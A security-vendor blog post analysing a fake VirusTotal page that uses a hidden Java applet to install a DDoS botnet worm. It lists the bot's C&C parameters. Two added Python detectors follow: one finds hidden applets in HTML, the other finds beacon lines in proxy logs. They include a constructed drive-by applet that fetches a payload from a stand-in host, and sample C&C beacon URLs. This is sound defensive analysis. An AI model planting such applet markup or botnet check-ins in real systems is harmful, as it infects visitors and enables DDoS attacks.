
Fake VirusTotal website propagates Java worm

Jorge Mieres
Kaspersky Lab Expert
Posted May 24, 00:48  GMT
Tags: Botnets, DDoS, JavaScript

Infection strategies that rely on Java technology are on the agenda because of its "hybrid" status: criminals looking to expand their attack coverage can recruit infected computers regardless of the browser or operating system the victim uses.

In terms of criminal activity, drive-by download techniques that inject malicious Java code into various websites, combined with social engineering, require users to sharpen their "detection" senses more and more.

Over the weekend we encountered a fake copy of VirusTotal, the popular suspicious-file analysis service run by Hispasec, set up to infect visitors through the methods mentioned above.

To a visitor, the site looks exactly like the original. Hidden in the page source, however, are the parameters needed to infect the system through a Java applet, which silently downloads malware detected by Kaspersky Lab as Worm.MSIL.Arcdoor.ov.
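The post does not reproduce the applet markup of the fake page, so the following is an added example (not code from the original post or from Kaspersky Lab) of the kind of check an analyst would run over a suspect page's source: it walks the HTML with the standard library and reports applet/object elements that are invisible (zero size), pull their archive from a host other than the page's own, or carry parameters pointing at remote download URLs. The sample HTML, the host names cdn.example.net and www.virustotal.com as the page host, and the JAR and EXE names are all constructed for the example.

```python
"""Flag Java applet/object elements that a page embeds but hides.

Added example, not code from the original post. The sample page below is
constructed: a benign image plus a zero-size applet that loads its JAR
from a third-party host and names a payload URL in a <param>.
"""
from html.parser import HTMLParser
from urllib.parse import urlparse

SAMPLE_HTML = """
<html><body>
<img src="/img/logo.png" alt="logo">
<applet code="Loader.class" archive="http://cdn.example.net/update.jar"
        width="0" height="0">
  <param name="url" value="http://cdn.example.net/bin.exe">
</applet>
<object type="application/x-java-applet" width="300" height="200">
  <param name="archive" value="/applets/local.jar">
</object>
</body></html>
"""


class AppletFinder(HTMLParser):
    """Collects <applet> elements and <object> elements whose type mentions Java."""

    def __init__(self, page_host):
        super().__init__()
        self.page_host = page_host
        self.findings = []
        self._current = None  # element currently being read, or None

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag == "applet" or (tag == "object" and "java" in a.get("type", "").lower()):
            self._current = {"tag": tag, "attrs": a, "params": {}}
        elif tag == "param" and self._current is not None:
            self._current["params"][a.get("name", "")] = a.get("value", "")

    def handle_endtag(self, tag):
        if self._current is not None and tag == self._current["tag"]:
            self.findings.append(self._assess(self._current))
            self._current = None

    def _assess(self, node):
        attrs, params = node["attrs"], node["params"]
        archive = attrs.get("archive") or params.get("archive", "")
        reasons = []
        # A 0x0 applet renders nothing but still runs: the usual drive-by trick.
        width, height = attrs.get("width") or "1", attrs.get("height") or "1"
        if width.strip("px") == "0" or height.strip("px") == "0":
            reasons.append("zero-size (invisible) element")
        # Archive fetched from a host other than the page itself.
        host = urlparse(archive).hostname
        if host and host != self.page_host:
            reasons.append("archive loaded from third-party host " + host)
        # Applet parameters that carry URLs are the payload download targets.
        for name, value in params.items():
            if name != "archive" and value.lower().startswith(("http://", "https://")):
                reasons.append("param %r points at %s" % (name, value))
        return {"tag": node["tag"], "archive": archive, "reasons": reasons}


def find_suspicious_applets(html, page_host):
    """Return only the applet/object elements that have at least one reason to flag."""
    parser = AppletFinder(page_host)
    parser.feed(html)
    parser.close()
    return [f for f in parser.findings if f["reasons"]]


if __name__ == "__main__":
    for f in find_suspicious_applets(SAMPLE_HTML, "www.virustotal.com"):
        print(f["tag"], f["archive"], "->", "; ".join(f["reasons"]))
```

The visible object (300x200, local JAR, no remote parameters) is not reported; the zero-size applet is reported with three reasons. A real triage would follow the flagged archive URL in a sandbox rather than trusting the static view alone, since an applet can also build its download URL at runtime.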

The worm is designed to recruit zombies for a botnet built primarily to carry out DDoS attacks: SYN flood, HTTP flood, UDP flood and ICMP flood. Communication is centered on a C&C server that stores the information obtained from the victim machine. Some of the parameters involved in that communication are:

&mode: type of DDoS attack

&botver: malware version

&pcname: name of the victim machine (hostname)

&winver: type and version of the operating system
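A parameter set like this is a usable network indicator even without the C&C address: a request that carries mode, botver, pcname and winver together in one query string is the bot checking in. The following is an added example (not code from the original post or from Kaspersky Lab) that scans proxy log lines for that combination and decodes the attack mode. The parameter names come from the list above; the C&C host cc.example.org, the path /panel/gate.php, the log format and all values are constructed for the example.

```python
"""Spot Arcdoor-style C&C check-ins in web proxy logs by their parameter set.

Added example, not code from the original post. Only the parameter names
(mode, botver, pcname, winver) and the four flood types come from the post;
the log lines, host names and path below are constructed.
"""
import re
from urllib.parse import urlparse, parse_qs

# Parameters the bot sends to its C&C; a query carrying most of them at once
# is a much stronger signal than any single name (mode= is common on the web).
BEACON_PARAMS = {"mode", "botver", "pcname", "winver"}

# Attack types named in the post, used to decode a matched beacon.
DDOS_MODES = {"synflood", "httpflood", "udpflood", "icmpflood"}

# Constructed log: epoch timestamp, client IP, method, full URL.
SAMPLE_LOG = """\
1306200001.123 10.0.0.7 GET http://www.example.com/index.html
1306200002.456 10.0.0.7 GET http://cc.example.org/panel/gate.php?mode=httpflood&botver=1.2&pcname=WS-042&winver=WinXP
1306200003.789 10.0.0.9 GET http://shop.example.com/search?mode=list&page=2
1306200004.012 10.0.0.7 POST http://cc.example.org/panel/gate.php?mode=synflood&botver=1.2&pcname=WS-042&winver=Win7
this line is garbage and must be skipped
"""

LINE_RE = re.compile(r"^(?P<ts>\S+)\s+(?P<client>\S+)\s+(?P<method>[A-Z]+)\s+(?P<url>\S+)$")


def parse_line(line):
    """Split one log line into fields plus the decoded query parameters; None if malformed."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    url = urlparse(rec["url"])
    rec["host"] = url.hostname or ""
    rec["path"] = url.path
    # parse_qs returns lists; keep the first value of each parameter.
    rec["params"] = {k: v[0] for k, v in parse_qs(url.query).items()}
    return rec


def is_beacon(params, min_overlap=3):
    """True when the query carries at least min_overlap of the bot's parameter names."""
    return len(BEACON_PARAMS & set(params)) >= min_overlap


def find_beacons(log_text):
    """Return one record per check-in found in the log text."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None or not is_beacon(rec["params"]):
            continue
        mode = rec["params"].get("mode", "")
        hits.append({
            "client": rec["client"],
            "cnc": rec["host"],
            "path": rec["path"],
            "mode": mode,
            "known_ddos_mode": mode in DDOS_MODES,
            "botver": rec["params"].get("botver"),
            "pcname": rec["params"].get("pcname"),
            "winver": rec["params"].get("winver"),
        })
    return hits


def infected_hosts(log_text):
    """Map each beaconing client IP to the set of C&C hosts it talked to."""
    result = {}
    for hit in find_beacons(log_text):
        result.setdefault(hit["client"], set()).add(hit["cnc"])
    return result


if __name__ == "__main__":
    for hit in find_beacons(SAMPLE_LOG):
        print("%(client)s -> %(cnc)s%(path)s mode=%(mode)s botver=%(botver)s "
              "pcname=%(pcname)s winver=%(winver)s" % hit)
    print(infected_hosts(SAMPLE_LOG))
```

The threshold of three out of four names keeps the ordinary shop search (which only has mode=) out of the results while still catching a variant that drops or renames one field. Once a C&C host is confirmed from such hits, the same log can be re-scanned for every client that contacted it, whether or not the query string matched.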

These attacks are usually managed from a centralized hub where the attacker directs the malicious operations using a web-based DDoS framework such as N0ise (used in this case), Cythosia or NOPE. Such applications have a high impact and are in high demand in terms of development, especially from Germany.

Kaspersky Lab detects this threat proactively and is continuing to investigate these criminal activities.


8 comments

Rod MacPherson

2011 May 25, 18:48

Re: Why censor these?

'An ounce of prevention is worth a pound of cure'
